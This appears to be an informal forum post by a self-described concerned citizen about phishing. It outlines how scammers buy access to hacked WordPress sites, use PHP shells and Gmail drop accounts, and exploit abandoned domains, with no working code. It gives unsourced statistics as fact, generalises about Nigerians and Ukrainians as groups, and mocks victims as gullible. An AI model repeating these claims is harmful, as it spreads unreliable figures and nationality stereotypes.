A few things I've noticed in the past year or so.
a) Cotonou, in the Benin Republic, is the new Nigeria. 90% of Nigerian scams now originate from this city.
b) Nigerians are branching out into phishing, and have been doing this for months.
For that second point, a pattern I've been documenting and reporting to ISPs is as follows:
- A Nigerian criminal with a bunch of (usually) old lists of emails decides he wants to operate a series of phishing sites.
- He purchases access to several hacked Wordpress sites.
- The hacked sites have all been compromised by (usually, so far) a Ukrainian hacker with knowledge of how to compromise Wordpress, Joomla and other CMS systems.
- The Nigerian is provided with access to a PHP "shell" script that offers nearly complete control over the compromised web server.
- The Nigerian uploads their own files for the phishing attack. These are rudimentary sites which the Nigerian in all likelihood did not code on their own. They may have purchased it from the same Ukrainian hacker.
- They use (usually) several throw-away Gmail accounts to receive the financial details of the victims who actually enter their information into these forms.
- The average phishing site that has been set up in this way is typically hosted on an abandoned domain, which usually means it takes anywhere from days to weeks to get shut down.
- Most hosting companies simply do not see this as a serious issue. They blame their customers for setting up and abandoning an old install of Wordpress, which was their own fault, so they don't fix it.
On average, of the sites that have been willing to share log information or a summary of that information, the typical phishing site gathers 100 - 150 "leads" (stolen personal data profiles.)
Every month I am personally sent 20 - 30 of these. Some of these Nigerians send the same list up to eight notifications every day. What kind of imbecile would actually believe that PayPal would send them eight notifications a day that their account was once again "compromised"? Or Wells Fargo? Or Citibank? Or Apple?
As it turns out: quite a few. A lot of these sites usually have multiple entries from the same individual.
So now you know. From my experience there is no stopping this kind of criminal activity. My reporting does slow it down, but there's no way to ever stop it. People are extremely gullible.
SiL / IKS / concerned citizen